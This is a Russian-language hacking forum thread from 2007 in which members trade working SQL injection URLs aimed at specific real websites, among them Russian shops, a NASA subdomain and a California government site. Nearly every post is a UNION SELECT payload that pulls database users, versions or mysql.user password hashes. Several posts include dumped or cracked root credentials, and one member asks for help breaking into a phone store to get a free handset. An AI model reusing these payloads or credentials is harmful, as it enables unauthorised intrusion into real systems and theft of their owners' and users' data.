SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    http://www.lesbo.ru/erotexts/list.php?gid=-31+union+select+database()/*

    http://www.ghanaweb.com/law_cms/list.php?CAT=-4+union+select+1,2,3,4,5,6,7,concat(database(),0x3a,version()),9,10,11,12/*
     
    5 people like this.
  2. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.akimbo.biz/exhibitions/index.php?id=-6593+union+select+1,2,3,concat(password,0x3a,admin),5,6+from+users/*
    http://haytom.us/showarticle.php?id=-19%20UNION%20SELECT%201,user(),3,4,5/*
     
    4 people like this.
  3. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    @_@
    update
     
    #1823 Spyder, 10 Apr 2007
    Last edited: 10 Apr 2007
    3 people like this.
  4. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    :)

    :)

    :)

    :)

    Чего-то сегодня все недоделаные...непродуктивный день :D
     
    #1824 n0ne, 10 Apr 2007
    Last edited: 11 Apr 2007
    2 people like this.
  5. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    motvet.ru

    Не плохой мобильный портал =)

    Code:
    http://motvet.ru/aboutgame.php?IDNew=-1038+union+select+1,2,3,4,5,6,concat(user,char(58),password),8,9,10+from+mysql.user/*&id=3
    root:045a18944aed3d1b
     
    4 people like this.
  6. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    http://www.ueet.nasa.gov/toi/viewtoi.php?id=-1+union+select+1,version(),3,database(),5,6,7,8/*
     
    1 person likes this.
  7. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    www.777777.ru
    Code:
    http://www.777777.ru/index.php?link=news&id=-682+union+select+1,concat(user(),char(59),database(),char(59),version()),3/*
     
  8. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Поставил на расшифровку получил:

    root:aqz910
     
    2 people like this.
  9. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Sokol TV
    [​IMG]
    ============
    www.sokol-tv.ru
    ============
    Code:
    http://www.sokol-tv.ru/index.php?id=19&man=2&l=7&it=-77+union+select+1,2,3,version(),concat(user(),char(59),database())/*
     
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    limpompo, там скорее всего с локалхоста =\
    upd
     
    #1830 Spyder, 11 Apr 2007
    Last edited: 11 Apr 2007
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Code:
    http://www.energy.ca.gov/links/base.php?pagetype=-147+union+select+1,concat(user,char(58),password),3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147+from+mysql.user/*
    @_@
    Грузится около 350 кб. Кому делать нефиг =\
     
    #1831 Spyder, 11 Apr 2007
    Last edited: 11 Apr 2007
  12. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    http://www.1mobile.ru/catalogue.php?group_id=1'

    Помогите подобрать =) А то денег нет на сотик новый
     
  13. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Можт кто подберет талицу, отпишитесь
     
  14. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    www.decosp.ru

    Code:
    http://www.decosp.ru/index.php?idNew=-85+union+select+1,2,3,4,5,concat(user(),char(58),version(),char(58),database()),7/*
     
    1 person likes this.
  15. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    d-seller.ru


    Интернет супермарккет!

    Code:
    http://d-seller.ru/index.php?page=mobilecontent&mkpage=indexjava.php&IDNew=-1087/**/union/**/select/**/1,concat(user,char(58),password),3,4,5,6,7,8,9,10/**/from/**/mysql.user/*&action=about&id=5&countCurrentPage=&sort=&chosenPhone=_&filterByPhone=
    root:045a18944aed3d1b
     
    2 people like this.
  16. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    логин: root
    пасс: aqz910

    ===========
    Заметил что hash одинаков с

    https://forum.antichat.ru/showpost.php?p=334228&postcount=1921
    ===========
     
    2 people like this.
  17. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    уже было, юзайте поиск:
    А в базе интересного всё равно ничего нет, уж поверьте, я точно знаю из надёжных источников ;)
     
    2 people like this.
  18. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    Подобрал только вот эту (price):
    Code:
    http://www.laguna.by/base.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+price/*
    и вот эту (tkan):
    Code:
    http://www.laguna.by/base.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+tkan/*
    боюсь, там мало интересного =/
     
    1 person likes this.
  19. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    Code:
    http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+user(),version()/*
    http://www.origami.as/gallery.php?gallery=17&image=-304+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
    http://www.buhgalteria.com.ua/Answer.html?id=2869+union+select+null,null/*
     
    #1839 _GaLs_, 11 Apr 2007
    Last edited: 11 Apr 2007
    3 people like this.
  20. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.buhgalteria.com.ua/Hit.html?id=-1+union+select+1,2,3,4,5,6,7,convert(password%20using%20cp1251)%20+from+mysql.user/*
     
    2 people like this.
Thread Status:
Not open for further replies.